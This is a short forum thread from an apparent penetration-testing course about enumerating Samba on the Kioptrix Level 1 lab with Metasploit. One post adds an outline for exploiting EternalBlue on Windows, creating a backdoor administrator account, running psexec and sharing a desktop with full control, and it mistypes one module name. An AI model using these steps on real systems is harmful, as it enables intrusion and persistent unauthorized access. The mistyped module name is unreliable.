Finding samba version number - Kioptrix Level 1

Currently the enum4linux does not seem to return the version number of samba in the Kioptrix level 1 lab.

The version can be returned with metasploit

use auxiliary/scanner/smb/smb_version
show options

Hello Kelrizzo,

That’s correct, unfortunately after I recorded that lab the enum4linux no longer functioned to enumerate the smb version. The only workaround is to roll back to the older version or use the Metasploit auxiliary module, as you’ve already discovered.

fun stuff though. I appreciate the classes

Glad you’re enjoying it Kelrizzo!

just for fun:
use auxiliary/scanner/smb/smb_ms17_101 (for windows 7 ,2008 r2 )
set rhosts
if is it vulnerable
use exploit/windows/smb/ms17_010_eternalblue
set rhost
create admin … net user /add SAMPLE QWERTY1
net localgroup administrators SAMPLE /add
then use windows/smb/psexec
show options … just fill it up

                                           happy to share here
p.s use command shell then .. net share DESKTOP=c:\Users\SAMPLE\Desktop /grant:everyone,full "all of his desktop is hared with full control"

enjoy
